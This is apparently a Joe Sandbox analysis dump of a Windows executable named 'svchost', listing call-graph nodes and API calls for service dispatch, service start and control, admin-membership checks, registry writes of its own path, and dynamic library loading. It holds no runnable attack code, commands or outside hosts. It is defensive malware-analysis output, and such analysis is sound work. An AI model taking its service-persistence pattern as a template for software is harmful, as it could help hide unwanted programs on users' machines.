11508->11507 11510 413d8b 11511 413d97 GetCommandLineW 11510->11511 11513 4136a9 __amsg_exit 67 API calls 11510->11513 11591 418aaf GetEnvironmentStringsW 11511->11591 11515 413d96 11513->11515 11514 413da6 11753 418a01 GetModuleFileNameW 11514->11753 11515->11511 11517 413db0 11518 413db4 11517->11518 11519 413dbc 11517->11519 11520 4136a9 __amsg_exit 67 API calls 11518->11520 11597 4187d2 11519->11597 11522 413dbb 11520->11522 11522->11519 11524 413dc5 11526 4136a9 __amsg_exit 67 API calls 11524->11526 11525 413dcd 11609 413768 11525->11609 11529 413dcc 11526->11529 11528 413dd4 11530 413de0 11528->11530 11531 413dd9 11528->11531 11529->11525 11615 409b70 11530->11615 11532 4136a9 __amsg_exit 67 API calls 11531->11532 11534 413ddf 11532->11534 11534->11530 11541 413d5f 11540->11541 11541->11503 11745 413cd9 11541->11745 11543 416595 11542->11543 11544 41658e 11542->11544 11546 4166fd 11543->11546 11547 41659f GetProcAddress GetProcAddress GetProcAddress GetProcAddress 11543->11547 11545 413679 __crt_waiting_on_module_handle 2 API calls 11544->11545 11548 416594 11545->11548 11778 416294 11546->11778 11549 4165e8 TlsAlloc 11547->11549 11548->11543 11552 413d71 11549->11552 11553 416636 TlsSetValue 11549->11553 11552->11507 11552->11508 11553->11552 11554 416647 11553->11554 11757 413963 11554->11757 11559 41616a __encode_pointer 6 API calls 11560 416667 11559->11560 11561 41616a __encode_pointer 6 API calls 11560->11561 11562 416677 11561->11562 11563 41616a __encode_pointer 6 API calls 11562->11563 11564 416687 11563->11564 11774 414450 11564->11774 11567 4161e5 __decode_pointer 6 API calls 11568 4166a8 11567->11568 11568->11546 11569 4140f6 __calloc_crt 67 API calls 11568->11569 11570 4166c1 11569->11570 11570->11546 11571 4161e5 __decode_pointer 6 API calls 11570->11571 11572 4166db 11571->11572 11572->11546 11573 4166e2 11572->11573 11574 4162d1 __initptd 67 API calls 11573->11574 11575 4166ea GetCurrentThreadId 11574->11575 11575->11552 11790 416a78 11576->11790 11578 413e69 GetStartupInfoA 11579 4140f6 __calloc_crt 67 API calls 11578->11579 11580 413e8a 11579->11580 11581 4140a8 __mtinitlocknum 11580->11581 11584 4140f6 __calloc_crt 67 API calls 11580->11584 11589 413fef 11580->11589 11590 413f72 11580->11590 11581->11510 11582 414025 GetStdHandle 11582->11589 11583 41408a SetHandleCount 11583->11581 11584->11580 11585 414037 GetFileType 11585->11589 11586 413f9b GetFileType 11586->11590 11587 418527 __mtinitlocknum InitializeCriticalSectionAndSpinCount 11587->11589 11588 418527 __mtinitlocknum InitializeCriticalSectionAndSpinCount 11588->11590 11589->11581 11589->11582 11589->11583 11589->11585 11589->11587 11590->11581 11590->11586 11590->11588 11590->11589 11592 418ac0 11591->11592 11593 418ac4 11591->11593 11592->11514 11594 4140b1 __malloc_crt 67 API calls 11593->11594 11595 418ae5 _realloc 11594->11595 11596 418aec FreeEnvironmentStringsW 11595->11596 11596->11514 11598 4187ea _wcslen 11597->11598 11602 413dc1 11597->11602 11599 4140f6 __calloc_crt 67 API calls 11598->11599 11607 41880e _wcslen 11599->11607 11600 418873 11601 414190 __mtinitlocknum 67 API calls 11600->11601 11601->11602 11602->11524 11602->11525 11603 4140f6 __calloc_crt 67 API calls 11603->11607 11604 418899 11605 414190 __mtinitlocknum 67 API calls 11604->11605 11605->11602 11607->11600 11607->11602 11607->11603 11607->11604 11791 41be80 11607->11791 11800 415360 11607->11800 11611 413776 __IsNonwritableInCurrentImage 11609->11611 11809 417fc1 11611->11809 11612 413794 __initterm_e 11614 4137b3 __IsNonwritableInCurrentImage __initterm 11612->11614 11813 417f5e 11612->11813 11614->11528 11942 401a00 GetConsoleWindow 11615->11942 11617 409b78 __flswbuf 11618 413b64 __fileno 67 API calls 11617->11618 11619 409b8b 11618->11619 11947 413a6d 11619->11947 11621 409b94 __flswbuf 11622 413b64 __fileno 67 API calls 11621->11622 11623 409baa 11622->11623 11624 413a6d __setmode 69 API calls 11623->11624 11625 409bb3 11624->11625 11966 409920 AllocateAndInitializeSid 11625->11966 11629 409bc0 11630 409bcb 11629->11630 11631 413919 67 API calls 11629->11631 11632 409eb0 TlsAlloc 11630->11632 11635 4097b0 79 API calls 11630->11635 11631->11630 11633 409ec4 11632->11633 11634 409ec9 GetStdHandle 11632->11634 12249 40a860 11633->12249 11638 409ed5 StartServiceCtrlDispatcherW 11634->11638 11639 409f0b 11634->11639 11637 409bf1 11635->11637 11640 409c10 11637->11640 11641 409bf8 11637->11641 11642 409f41 11638->11642 11643 409efe GetLastError 11638->11643 12271 4098d0 GetConsoleWindow 11639->12271 11648 4097b0 79 API calls 11640->11648 12024 40ef10 11641->12024 11645 413919 67 API calls 11642->11645 11643->11639 11647 409f1b 11643->11647 11650 409f47 11645->11650 11654 4052c0 107 API calls 11647->11654 11652 409c1d 11648->11652 11649 409f12 11653 413919 67 API calls 11649->11653 11651 409c07 11655 413919 67 API calls 11651->11655 11656 409c24 11652->11656 11657 409c3c 11652->11657 11653->11647 11658 409f22 11654->11658 11655->11640 11661 40ef10 164 API calls 11656->11661 11660 4097b0 79 API calls 11657->11660 11659 405400 3 API calls 11658->11659 11662 409f32 11659->11662 11663 409c49 11660->11663 11664 409c33 11661->11664 12278 408480 11662->12278 11667 409c50 11663->11667 11668 409c7e 11663->11668 11665 413919 67 API calls 11664->11665 11665->11657 11670 40ef10 164 API calls 11667->11670 11671 4097b0 79 API calls 11668->11671 11673 409c5f 11670->11673 11674 409c8b 11671->11674 11672 413919 67 API calls 11672->11642 11677 409c6c 11673->11677 11680 413919 67 API calls 11673->11680 11675 409c92 11674->11675 11676 409caa 11674->11676 11678 40ef10 164 API calls 11675->11678 11679 4097b0 79 API calls 11676->11679 11681 40ef10 164 API calls 11677->11681 11680->11677 11746 413ce7 11745->11746 11747 413cec 11745->11747 11749 417dfe __FF_MSGBANNER 67 API calls 11746->11749 11748 417c53 __NMSG_WRITE 67 API calls 11747->11748 11750 413cf4 11748->11750 11749->11747 11751 4136fd __mtinitlocknum 3 API calls 11750->11751 11752 413cfe 11751->11752 11752->11503 11755 418a36 _wparse_cmdline 11753->11755 11754 418a79 _wparse_cmdline 11754->11517 11755->11754 11756 4140b1 __malloc_crt 67 API calls 11755->11756 11756->11754 11784 4161dc 11757->11784 11759 41396b __init_pointers __initp_misc_winsig 11787 418176 11759->11787 11762 41616a __encode_pointer 6 API calls 11763 4139a7 11762->11763 11764 41616a TlsGetValue 11763->11764 11765 4161a3 GetModuleHandleW 11764->11765 11766 416182 11764->11766 11768 4161b3 11765->11768 11769 4161be GetProcAddress 11765->11769 11766->11765 11767 41618c TlsGetValue 11766->11767 11772 416197 11767->11772 11770 413679 __crt_waiting_on_module_handle 2 API calls 11768->11770 11771 41619b 11769->11771 11773 4161b9 11770->11773 11771->11559 11772->11765 11772->11771 11773->11769 11773->11771 11775 41445b 11774->11775 11776 418527 __mtinitlocknum InitializeCriticalSectionAndSpinCount 11775->11776 11777 414489 11775->11777 11776->11775 11777->11546 11777->11567 11779 4162aa 11778->11779 11780 41629e 11778->11780 11781 4162cc 11779->11781 11782 4162be TlsFree 11779->11782 11783 4161e5 __decode_pointer 6 API calls 11780->11783 11781->11781 11782->11781 11783->11779 11785 41616a __encode_pointer 6 API calls 11784->11785 11786 4161e3 11785->11786 11786->11759 11788 41616a __encode_pointer 6 API calls 11787->11788 11789 41399d 11788->11789 11789->11762 11790->11578 11792 41be91 11791->11792 11793 41be98 11791->11793 11792->11793 11798 41bec4 11792->11798 11794 4154f0 __mtinitlocknum 67 API calls 11793->11794 11795 41be9d 11794->11795 11796 415488 _strcpy_s 6 API calls 11795->11796 11797 41beac 11796->11797 11797->11607 11798->11797 11799 4154f0 __mtinitlocknum 67 API calls 11798->11799 11799->11795 11807 412d20 11800->11807 11802 41538d IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11803 415469 GetCurrentProcess TerminateProcess 11802->11803 11804 41545d __invoke_watson 11802->11804 11805 412cdc __except_handler4 5 API calls 11803->11805 11804->11803 11806 415486 11805->11806 11806->11607 11808 412d2c __VEC_memzero 11807->11808 11808->11802 11810 417fc7 11809->11810 11811 41616a __encode_pointer 6 API calls 11810->11811 11812 417fdf 11810->11812 11811->11810 11812->11612 11816 417f22 11813->11816 11815 417f6b 11815->11614 11817 417f2e __mtinitlocknum 11816->11817 11824 413715 11817->11824 11823 417f4f __mtinitlocknum 11823->11815 11825 4145cc __lock 67 API calls 11824->11825 11826 41371c 11825->11826 11827 417e37 11826->11827 11828 4161e5 __decode_pointer 6 API calls 11827->11828 11829 417e4b 11828->11829 11830 4161e5 __decode_pointer 6 API calls 11829->11830 11831 417e5b 11830->11831 11832 417ede 11831->11832 11847 41bcbd 11831->11847 11844 417f58 11832->11844 11834 41616a __encode_pointer 6 API calls 11837 417ed3 11834->11837 11835 417e9d 11835->11832 11840 414142 __realloc_crt 73 API calls 11835->11840 11841 417eb3 11835->11841 11836 417e79 11836->11835 11843 417ec5 11836->11843 11860 414142 11836->11860 11839 41616a __encode_pointer 6 API calls 11837->11839 11839->11832 11840->11841 11841->11832 11842 41616a __encode_pointer 6 API calls 11841->11842 11842->11843 11843->11834 11938 41371e 11844->11938 11848 41bcc9 __mtinitlocknum 11847->11848 11849 41bcf6 11848->11849 11850 41bcd9 11848->11850 11851 41bd37 HeapSize 11849->11851 11853 4145cc __lock 67 API calls 11849->11853 11852 4154f0 __mtinitlocknum 67 API calls 11850->11852 11857 41bcee __mtinitlocknum 11851->11857 11854 41bcde 11852->11854 11855 41bd06 ___sbh_find_block 11853->11855 11856 415488 _strcpy_s 6 API calls 11854->11856 11865 41bd57 11855->11865 11856->11857 11857->11836 11864 41414b 11860->11864 11862 41418a 11862->11835 11863 41416b Sleep 11863->11864 11864->11862 11864->11863 11869 418e09 11864->11869 11868 4144f2 LeaveCriticalSection 11865->11868 11867 41bd32 11867->11851 11867->11857 11868->11867 11870 418e15 __mtinitlocknum 11869->11870 11871 418e2a 11870->11871 11872 418e1c 11870->11872 11873 418e31 11871->11873 11874 418e3d 11871->11874 11905 418c21 11872->11905 11876 414190 __mtinitlocknum 67 API calls 11873->11876 11881 418faf 11874->11881 11904 418e4a ___sbh_resize_block _realloc ___sbh_find_block 11874->11904 11891 418e24 __dosmaperr __mtinitlocknum 11876->11891 11877 418fe2 11878 418596 _malloc 6 API calls 11877->11878 11882 418fe8 11878->11882 11879 4145cc __lock 67 API calls 11879->11904 11880 418fb4 HeapReAlloc 11880->11881 11880->11891 11881->11877 11881->11880 11883 419006 11881->11883 11885 418596 _malloc 6 API calls 11881->11885 11887 418ffc 11881->11887 11884 4154f0 __mtinitlocknum 67 API calls 11882->11884 11886 4154f0 __mtinitlocknum 67 API calls 11883->11886 11883->11891 11884->11891 11885->11881 11888 41900f GetLastError 11886->11888 11890 4154f0 __mtinitlocknum 67 API calls 11887->11890 11888->11891 11892 418f7d 11890->11892 11891->11864 11892->11891 11894 418f82 GetLastError 11892->11894 11893 418ed5 HeapAlloc 11893->11904 11894->11891 11895 418f2a HeapReAlloc 11895->11904 11896 419803 ___sbh_alloc_block 5 API calls 11896->11904 11897 418f95 11897->11891 11900 4154f0 __mtinitlocknum 67 API calls 11897->11900 11898 418596 _malloc 6 API calls 11898->11904 11899 419054 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 11899->11904 11902 418fa2 11900->11902 11901 418f78 11903 4154f0 __mtinitlocknum 67 API calls 11901->11903 11902->11888 11902->11891 11903->11892 11904->11877 11904->11879 11904->11891 11904->11893 11904->11895 11904->11896 11904->11897 11904->11898 11904->11899 11904->11901 11922 418f4d 11904->11922 11906 418cd4 11905->11906 11912 418c33 11905->11912 11907 418596 _malloc 6 API calls 11906->11907 11908 418cda 11907->11908 11910 4154f0 __mtinitlocknum 66 API calls 11908->11910 11909 417dfe __FF_MSGBANNER 66 API calls 11909->11912 11911 418ccc 11910->11911 11911->11891 11912->11909 11912->11911 11914 417c53 __NMSG_WRITE 66 API calls 11912->11914 11915 418c90 HeapAlloc 11912->11915 11916 4136fd __mtinitlocknum 3 API calls 11912->11916 11917 418cc0 11912->11917 11918 418596 _malloc 6 API calls 11912->11918 11920 418cc5 11912->11920 11925 418bd2 11912->11925 11914->11912 11915->11912 11916->11912 11919 4154f0 __mtinitlocknum 66 API calls 11917->11919 11918->11912 11919->11920 11921 4154f0 __mtinitlocknum 66 API calls 11920->11921 11921->11911 11937 4144f2 LeaveCriticalSection 11922->11937 11924 418f54 11924->11904 11926 418bde __mtinitlocknum 11925->11926 11927 418c0f __mtinitlocknum 11926->11927 11928 4145cc __lock 67 API calls 11926->11928 11927->11912 11929 418bf4 11928->11929 11930 419803 ___sbh_alloc_block 5 API calls 11929->11930 11931 418bff 11930->11931 11933 418c18 11931->11933 11936 4144f2 LeaveCriticalSection 11933->11936 11935 418c1f 11935->11927 11936->11935 11937->11924 11941 4144f2 LeaveCriticalSection 11938->11941 11940 413725 11940->11823 11941->11940 11943 401a2b 11942->11943 11944 401a0b GetWindowThreadProcessId 11942->11944 11943->11617 11944->11943 11945 401a1a GetCurrentProcessId 11944->11945 11945->11943 11946 401a25 FreeConsole 11945->11946 11946->11943 11949 413a79 __mtinitlocknum 11947->11949 11948 413ac1 11950 413ad6 11948->11950 11951 413ac9 11948->11951 11949->11948 11955 413a9f 11949->11955 11952 413ae4 11950->11952 11956 413b11 11950->11956 11953 4154f0 __mtinitlocknum 67 API calls 11951->11953 11954 4154f0 __mtinitlocknum 67 API calls 11952->11954 11962 413ab6 __mtinitlocknum 11953->11962 11959 413aa4 11954->11959 11957 4154f0 __mtinitlocknum 67 API calls 11955->11957 11958 4186bb ___lock_fhandle 68 API calls 11956->11958 11957->11959 11960 413b17 11958->11960 11961 415488 _strcpy_s 6 API calls 11959->11961 11963 4154f0 __mtinitlocknum 67 API calls 11960->11963 11964 413b24 __setmode_nolock 11960->11964 11961->11962 11962->11621 11963->11964 12283 413b5a 11964->12283 11967 409973 CheckTokenMembership FreeSid 11966->11967 11968 40998f 11966->11968 11967->11968 11969 412cdc __except_handler4 5 API calls 11968->11969 11970 40999b 11969->11970 11971 408310 11970->11971 12287 408200 LoadLibraryW 11971->12287 11974 4083c8 11975 4083da 11974->11975 11977 408200 112 API calls 11974->11977 11975->11629 11979 408400 11977->11979 11982 40844b 11979->11982 11983 408250 120 API calls 11979->11983 11980 40837d 11980->11629 11981 408250 120 API calls 11984 408398 11981->11984 11982->11629 11985 40841c 11983->11985 11986 408250 120 API calls 11984->11986 11987 4083aa 11984->11987 11988 408250 120 API calls 11985->11988 11989 40842e 11985->11989 11986->11974 11987->11629 11988->11982 11989->11629 12025 40ef56 12024->12025 12026 40ef36 12024->12026 12028 40ca70 4 API calls 12025->12028 12027 4098d0 116 API calls 12026->12027 12029 40ef3d 12027->12029 12030 40ef62 12028->12030 12033 412cdc __except_handler4 5 API calls 12029->12033 12031 40ef6b __flswbuf 12030->12031 12032 40ef9c 12030->12032 12036 405470 109 API calls 12031->12036 12035 40cab0 135 API calls 12032->12035 12034 40ef4f 12033->12034 12034->11651 12037 40efeb 12035->12037 12040 40ef7e 12036->12040 12038 40f003 12037->12038 12039 40eff4 CloseServiceHandle 12037->12039 12041 40f00b StartServiceW GetLastError CloseServiceHandle 12038->12041 12042 40f10f 12038->12042 12076 40f091 12039->12076 12043 412cdc __except_handler4 5 API calls 12040->12043 12045 40f038 12041->12045 12046 40f03c 12041->12046 12047 40f175 ControlService GetLastError CloseServiceHandle 12042->12047 12048 40f119 QueryServiceStatus GetLastError 12042->12048 12049 40ef95 12043->12049 12044 412cdc __except_handler4 5 API calls 12046->12045 12054 40f14b 12048->12054 12049->11651 12076->12044 12250 40a86a __write_nolock 12249->12250 12251 412731 __snwprintf_s 101 API calls 12250->12251 12252 40a893 12251->12252 12253 40a89c 12252->12253 12254 40a8cf RegCreateKeyExW 12252->12254 12257 405400 3 API calls 12253->12257 12255 40a935 GetModuleFileNameW 12254->12255 12256 40a8f5 GetLastError 12254->12256 12259 40a954 12255->12259 12258 4052c0 107 API calls 12256->12258 12260 40a8b2 12257->12260 12261 40a903 12258->12261 12259->12259 12262 40a95f RegSetValueExW RegSetValueExW 12259->12262 12263 412cdc __except_handler4 5 API calls 12260->12263 12265 405400 3 API calls 12261->12265 12266 412cdc __except_handler4 5 API calls 12262->12266 12264 40a8c8 12263->12264 12264->11634 12267 40a918 12265->12267 12268 40a9b6 12266->12268 12269 412cdc __except_handler4 5 API calls 12267->12269 12268->11634 12272 409904 12271->12272 12273 4098ee __flswbuf 12271->12273 12274 4054a0 112 API calls 12272->12274 12276 405470 109 API calls 12273->12276 12275 40990d 12274->12275 12275->11649 12277 4098fc 12276->12277 12277->11649 12279 408490 FreeLibrary 12278->12279 12280 408493 12278->12280 12279->12280 12281 40849c FreeLibrary 12280->12281 12282 40849f 12280->12282 12281->12282 12282->11672 12286 41875b LeaveCriticalSection 12283->12286 12285 413b62 12285->11962 12286->12285 12288 40823e 12287->12288 12289 40821e GetLastError 12287->12289 12288->11974 12293 408250 GetProcAddress 12288->12293 12290 4052c0 107 API calls 12289->12290 12291 40822d 12290->12291 12292 405400 3 API calls 12291->12292 12292->12288 12294 408279 GetLastError 12293->12294 12302 408302 12293->12302 12306 413380 12294->12306 12297 4082b6 12300 413380 __cftoe 81 API calls 12297->12300 12298 4082cc 12299 4082ef 12298->12299 12301 4052c0 107 API calls 12298->12301 12299->12302 12303 4082f6 GetProcessHeap HeapFree 12299->12303 12300->12298 12304 4082de 12301->12304 12302->11980 12302->11981 12303->12302 12305 405400 3 API calls 12304->12305 12305->12299 12309 413270 12306->12309 12310 413286 12309->12310 12311 4132b0 12310->12311 12312 41328b 12310->12312 12315 412ac5 _LocaleUpdate::_LocaleUpdate 77 API calls 12311->12315 12313 4154f0 __mtinitlocknum 67 API calls 12312->12313 12314 413297 12313->12314 12316 415488 _strcpy_s 6 API calls 12314->12316 12317 4132ca 12315->12317 12318 408294 GetProcessHeap HeapAlloc 12316->12318 12319 4132e5 12317->12319 12320 4132dc 12317->12320 12318->12297 12318->12298 12330 4130cf 12319->12330 12322 4154f0 __mtinitlocknum 67 API calls 12320->12322 12329 4132e1 12322->12329 12323 4132f3 12324 4132fb 12323->12324 12326 413319 12323->12326 12327 4154f0 __mtinitlocknum 67 API calls 12324->12327 12325 415488 _strcpy_s 6 API calls 12325->12318 12326->12318 12328 4154f0 __mtinitlocknum 67 API calls 12326->12328 12327->12318 12328->12329 12329->12325 12331 4130e5 12330->12331 12332 413100 12331->12332 12333 41311d 12331->12333 12334 4130ea _strlen 12331->12334 12335 4154f0 __mtinitlocknum 67 API calls 12332->12335 12336 412ac5 _LocaleUpdate::_LocaleUpdate 77 API calls 12333->12336 12334->12323 12337 413105 12335->12337 12338 413128 12336->12338 12339 415488 _strcpy_s 6 API calls 12337->12339 12340 413220 12338->12340 12341 413133 12338->12341 12339->12334 12340->12334 12342 41322e MultiByteToWideChar 12340->12342 12341->12334 12343 413180 MultiByteToWideChar 12341->12343 12342->12334 12345 413242 12342->12345 12343->12334 12344 41319c GetLastError 12343->12344 11442 40b310 11443 40b353 11442->11443 11444 40b336 11442->11444 11446 412731 __snwprintf_s 101 API calls 11443->11446 11445 412731 __snwprintf_s 101 API calls 11444->11445 11447 40b34e 11445->11447 11446->11447 11448 40b371 11447->11448 11449 40b3a3 11447->11449 11450 405400 3 API calls 11448->11450 11451 40b411 RegOpenKeyExW 11449->11451 11452 40b3b4 RegCreateKeyExW 11449->11452 11454 40b389 11450->11454 11453 40b3d0 11451->11453 11452->11453 11455 40b3d4 GetLastError 11453->11455 11456 40b427 11453->11456 11457 412cdc __except_handler4 5 API calls 11454->11457 11458 4052c0 107 API calls 11455->11458 11459 412cdc __except_handler4 5 API calls 11456->11459 11460 40b39c 11457->11460 11461 40b3e2 11458->11461 11462 40b438 11459->11462 11463 405400 3 API calls 11461->11463 11464 40b3f7 11463->11464 11465 412cdc __except_handler4 5 API calls 11464->11465 11466 40b40a 11465->11466 11467 40af10 11468 40ae90 112 API calls 11467->11468 11469 40af26 11468->11469 14334 412633 14341 414447 14334->14341 14337 412646 14338 414190 __mtinitlocknum 67 API calls 14337->14338 14340 412651 14338->14340 14354 41436d 14341->14354 14343 412638 14343->14337 14344 41421e 14343->14344 14345 41422a __mtinitlocknum 14344->14345 14346 4145cc __lock 67 API calls 14345->14346 14353 414236 14346->14353 14347 41429f 14384 4142b4 14347->14384 14349 4142ab __mtinitlocknum 14349->14337 14350 414274 DeleteCriticalSection 14352 414190 __mtinitlocknum 67 API calls 14350->14352 14352->14353 14353->14347 14353->14350 14371 419b5f 14353->14371 14355 414379 __mtinitlocknum 14354->14355 14356 4145cc __lock 67 API calls 14355->14356 14357 414388 14356->14357 14358 414420 14357->14358 14360 412694 _printf 68 API calls 14357->14360 14363 414325 105 API calls __fflush_nolock 14357->14363 14364 41440f 14357->14364 14367 41443e 14358->14367 14360->14357 14361 41442c __mtinitlocknum 14361->14343 14363->14357 14365 412702 _printf 2 API calls 14364->14365 14366 41441d 14365->14366 14366->14357 14370 4144f2 LeaveCriticalSection 14367->14370 14369 414445 14369->14361 14370->14369 14372 419b6b __mtinitlocknum 14371->14372 14373 419b9c 14372->14373 14374 419b7f 14372->14374 14376 412653 __lock_file 68 API calls 14373->14376 14382 419b94 __mtinitlocknum 14373->14382 14375 4154f0 __mtinitlocknum 67 API calls 14374->14375 14377 419b84 14375->14377 14378 419bb4 14376->14378 14379 415488 _strcpy_s 6 API calls 14377->14379 14387 419ae8 14378->14387 14379->14382 14382->14353 14461 4144f2 LeaveCriticalSection 14384->14461 14386 4142bb 14386->14349 14388 419b18 14387->14388 14389 419afc 14387->14389 14391 419b11 14388->14391 14393 4142bd __flush 101 API calls 14388->14393 14390 4154f0 __mtinitlocknum 67 API calls 14389->14390 14392 419b01 14390->14392 14403 419bd3 14391->14403 14394 415488 _strcpy_s 6 API calls 14392->14394 14395 419b24 14393->14395 14394->14391 14406 41c072 14395->14406 14398 413b64 __fileno 67 API calls 14399 419b32 14398->14399 14410 41bfa5 14399->14410 14401 419b38 14401->14391 14402 414190 __mtinitlocknum 67 API calls 14401->14402 14402->14391 14404 4126c6 _fwprintf 2 API calls 14403->14404 14405 419bd9 14404->14405 14405->14382 14407 41c082 14406->14407 14409 419b2c 14406->14409 14408 414190 __mtinitlocknum 67 API calls 14407->14408 14407->14409 14408->14409 14409->14398 14411 41bfb1 __mtinitlocknum 14410->14411 14412 41bfd4 14411->14412 14413 41bfb9 14411->14413 14415 41bfe2 14412->14415 14419 41c023 14412->14419 14414 415503 __free_osfhnd 67 API calls 14413->14414 14416 41bfbe 14414->14416 14417 415503 __free_osfhnd 67 API calls 14415->14417 14420 4154f0 __mtinitlocknum 67 API calls 14416->14420 14418 41bfe7 14417->14418 14421 4154f0 __mtinitlocknum 67 API calls 14418->14421 14422 4186bb ___lock_fhandle 68 API calls 14419->14422 14423 41bfc6 __mtinitlocknum 14420->14423 14424 41bfee 14421->14424 14425 41c029 14422->14425 14423->14401 14426 415488 _strcpy_s 6 API calls 14424->14426 14427 41c044 14425->14427 14428 41c036 14425->14428 14426->14423 14430 4154f0 __mtinitlocknum 67 API calls 14427->14430 14433 41bf09 14428->14433 14431 41c03e 14430->14431 14448 41c068 14431->14448 14434 418644 __close_nolock 67 API calls 14433->14434 14437 41bf19 14434->14437 14435 41bf6f 14451 4185be 14435->14451 14437->14435 14439 418644 __close_nolock 67 API calls 14437->14439 14447 41bf4d 14437->14447 14441 41bf44 14439->14441 14440 418644 __close_nolock 67 API calls 14442 41bf59 CloseHandle 14440->14442 14445 418644 __close_nolock 67 API calls 14441->14445 14442->14435 14446 41bf65 GetLastError 14442->14446 14443 415516 __dosmaperr 67 API calls 14444 41bf99 14443->14444 14444->14431 14445->14447 14446->14435 14447->14435 14447->14440 14460 41875b LeaveCriticalSection 14448->14460 14450 41c070 14450->14423 14452 41862a 14451->14452 14453 4185cf 14451->14453 14454 4154f0 __mtinitlocknum 67 API calls 14452->14454 14453->14452 14459 4185fa 14453->14459 14455 41862f 14454->14455 14456 415503 __free_osfhnd 67 API calls 14455->14456 14457 418620 14456->14457 14457->14443 14457->14444 14458 41861a SetStdHandle 14458->14457 14459->14457 14459->14458 14460->14450 14461->14386

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 409b70-409bc2 call 401a00 call 41257c call 413b64 call 413a6d call 41257c call 413b64 call 413a6d call 409920 call 408310 19 409bc4-409bc6 call 413919 0->19 20 409bcb-409bd6 0->20 19->20 22 409eb0-409ec2 TlsAlloc 20->22 23 409bdc-409bf6 call 4097b0 20->23 24 409ec4 call 40a860 22->24 25 409ec9-409ed3 GetStdHandle 22->25 31 409c10-409c22 call 4097b0 23->31 32 409bf8-409c0b call 40ef10 call 413919 23->32 24->25 29 409ed5-409efc StartServiceCtrlDispatcherW 25->29 30 409f0b-409f16 call 4098d0 call 413919 25->30 33 409f41-409f47 call 413919 29->33 34 409efe-409f09 GetLastError 29->34 38 409f1b-409f3c call 4052c0 call 405400 call 408480 call 413919 30->38 47 409c24-409c37 call 40ef10 call 413919 31->47 48 409c3c-409c4e call 4097b0 31->48 32->31 34->30 34->38 38->33 47->48 58 409c50-409c64 call 40ef10 48->58 59 409c7e-409c90 call 4097b0 48->59 68 409c66-409c67 call 413919 58->68 69 409c6c-409c79 call 40ef10 call 413919 58->69 66 409c92-409ca5 call 40ef10 call 413919 59->66 67 409caa-409cbc call 4097b0 59->67 66->67 78 409cd6-409ce8 call 4097b0 67->78 79 409cbe-409cd1 call 40ef10 call 413919 67->79 68->69 69->59 86 409d02-409d14 call 4097b0 78->86 87 409cea-409cfd call 40ef10 call 413919 78->87 79->78 93 409d31-409d43 call 4097b0 86->93 94 409d16-409d2c call 40ef10 call 413919 86->94 87->86 100 409d45-409d4c 93->100 101 409d78-409d8a call 4097b0 93->101 94->93 103 409d62-409d73 call 40fee0 call 413919 100->103 104 409d4e-409d5d call 4099a0 call 413919 100->104 109 409d90-409da2 call 4097b0 101->109 110 409e2f-409e45 call 40daa0 101->110 103->101 104->103 109->110 120 409da8-409dba call 4097b0 109->120 118 409e47-409e4e 110->118 119 409e68-409e6c 110->119 118->119 121 409e50-409e52 118->121 122 409eaa-409eab call 413919 119->122 123 409e6e 119->123 120->110 131 409dbc-409dce call 4097b0 120->131 121->119 126 409e54-409e63 call 4099a0 call 413919 121->126 122->22 127 409e70-409e79 123->127 126->119 130 409e80-409e89 127->130 130->130 133 409e8b-409e96 130->133 131->110 140 409dd0-409de2 call 4097b0 131->140 137 409ea1-409ea4 133->137 138 409e98-409e9f 133->138 137->127 139 409ea6 137->139 138->137 138->138 139->122 140->110 143 409de4-409df6 call 4097b0 140->143 143->22 146 409dfc-409e03 143->146 147 409e05-409e14 call 4099a0 call 413919 146->147 148 409e19-409e2a call 40ebc0 call 413919 146->148 147->148 148->110
                                                    APIs
                                                      • Part of subcall function 00401A00: GetConsoleWindow.KERNELBASE ref: 00401A01
                                                      • Part of subcall function 00401A00: GetWindowThreadProcessId.USER32(00000000), ref: 00401A10
                                                      • Part of subcall function 00401A00: GetCurrentProcessId.KERNEL32 ref: 00401A1A
                                                      • Part of subcall function 00401A00: FreeConsole.KERNEL32 ref: 00401A25
                                                    • __fileno.LIBCMT ref: 00409B86
                                                    • __setmode.LIBCMT ref: 00409B8F
                                                    • __fileno.LIBCMT ref: 00409BA5
                                                    • __setmode.LIBCMT ref: 00409BAE
                                                      • Part of subcall function 00413A6D: ___lock_fhandle.LIBCMT ref: 00413B12
                                                      • Part of subcall function 00413A6D: __setmode_nolock.LIBCMT ref: 00413B2A
                                                      • Part of subcall function 00409920: AllocateAndInitializeSid.ADVAPI32(?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00409969
                                                      • Part of subcall function 00409920: CheckTokenMembership.KERNELBASE(00000000,?,0042340D,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040997E
                                                      • Part of subcall function 00409920: FreeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00409989
                                                      • Part of subcall function 00413919: _doexit.LIBCMT ref: 00413925
                                                    • TlsAlloc.KERNEL32(00000000), ref: 00409EB0
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00409ECB
                                                    • StartServiceCtrlDispatcherW.ADVAPI32 ref: 00409EF4
                                                    • GetLastError.KERNEL32 ref: 00409EFE
                                                      • Part of subcall function 004099A0: _memset.LIBCMT ref: 004099BD
                                                      • Part of subcall function 004099A0: GetProcessHeap.KERNEL32 ref: 004099E2
                                                      • Part of subcall function 004099A0: HeapAlloc.KERNEL32(00000000), ref: 004099EB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
